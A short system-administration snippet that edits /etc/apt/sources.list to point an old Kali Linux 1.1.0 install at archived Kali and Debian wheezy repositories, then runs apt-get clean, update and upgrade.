# nano /etc/apt/sources.list
#old Kali 1.1.0 Repo
deb http://old.kali.org/kali moto main non-free contrib
deb-src http://old.kali.org/kali moto main non-free contrib
deb http://old.kali.org/kali-security moto main non-free contrib
deb-src http://old.kali.org/kali-security moto main non-free contrib
#Debian Backports
deb http://ftp.debian.org/debian wheezy-backports main
###### Debian Main Repos
deb http://ftp.debian.org/debian/ wheezy main contrib non-free
deb-src http://ftp.debian.org/debian/ wheezy main contrib non-free
###### Debian Update Repos
deb http://security.debian.org/ wheezy/updates main contrib non-free
deb http://ftp.debian.org/debian/ wheezy-proposed-updates main contrib non-free
deb-src http://security.debian.org/ wheezy/updates main contrib non-free
deb-src http://ftp.debian.org/debian/ wheezy-proposed-updates main contrib non-free

-update repository
# apt-get clean && apt-get update && apt-get upgrade -y
